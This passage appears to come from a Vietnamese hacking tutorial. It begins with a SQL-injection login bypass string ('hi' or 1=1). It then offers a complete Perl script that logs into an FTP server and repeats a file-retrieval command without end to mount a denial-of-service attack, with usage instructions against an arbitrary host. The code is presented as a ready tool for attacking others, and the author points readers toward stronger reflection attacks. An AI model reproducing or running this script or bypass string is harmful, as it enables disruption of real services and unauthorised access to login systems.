- Login: hi' or 1=1 Pass: hi' or 1=
44Kỹ thuật tấn công DoS dễ dàng nhấ t:
_ Tôi thì mỗi lần muốn tấn công bằng DoS đều dùng chương trình này , nó chẳng kén gì cả và dễ thực hiện . Bây giờ tôi sẽ chia sẻ với các bạn .
_ Bạn cần phải có Activeperl ( lại là activepert ) đã cài sẵn , save đoạn mã sau vào file abc.pl : CODE #!/usr/bin/perl use IO::Socket; sub initiate {
if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host> <port> <username> <password>\nVi du : perl abc.pl 127.0.0.1 21 anonymous me@\n";}
$host = $ARGV[0]; $port = $ARGV[1]; $user = $ARGV[2]; $pass = $ARGV[3]; }; sub connecttoserver {
print("Connect den host: $host\n");
$socket = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM
) || die "khong the connect den $host"; print "Connect thanh cong . Loggin vao...\n"; };
sub login {
print "user $user\n";
print $socket "user $user\r\n"; $response = <$socket>;
print "$response\n"; print "pass $pass\n";
print $socket "pass $pass\r\n"; $response = <$socket>;
print "$response\n";
print "Logged in. Dang tan cong DoS doi phuong. Nhan CTRL-C de ngung.\n"; };
sub doit { for (;; ){
print "retr a:/x\n";
print $socket "retr a:/x\r\n"; $response = <$socket>; print "$response"; } } initiate(); connecttoserver(); login(); doit();
_Nếu bạn từng qua lập trình khi đọc đoạn mã bạn sẽ thấy rằng đoạn mã này dùng chính thông tin từ ổ đĩa A của nạn nhân để tấn công nạn nhân . Nó sử dụng vòng lặp không có giới hạn từ hàm $socket "retr a:/x\r\n" . Khi muốn kết thúc bạn chỉ cần nhấn ctrl+C . _Cuối cùng là bạn chỉ cần gọi nó ra thông qua lệnh perl như các bài trên .VD :
perl abc.pl http://www.xxx.com/ anonymous me trong đó User name và Password có thể là bất kỳ .
Vậy là coi như các bạn đã biết tấn công DoS là như thế nào rồi phải không ? Đó chỉ là những cách tấn công DoS thông thường ( nhưng hậu quả thì chẳng thường thường chút nào ) , còn các kỹ thuật DoS lợi hại khác như DRDoS thì cho các bạn nghiên cứu thêm vậy . Nó rất nguy hiểm khi sử dụng lung tung nên để dành phần đó cho các bạn nào thích và thật sự muốn nghiên cứu về nó . Tôi xin dừng phần DoS tại đây .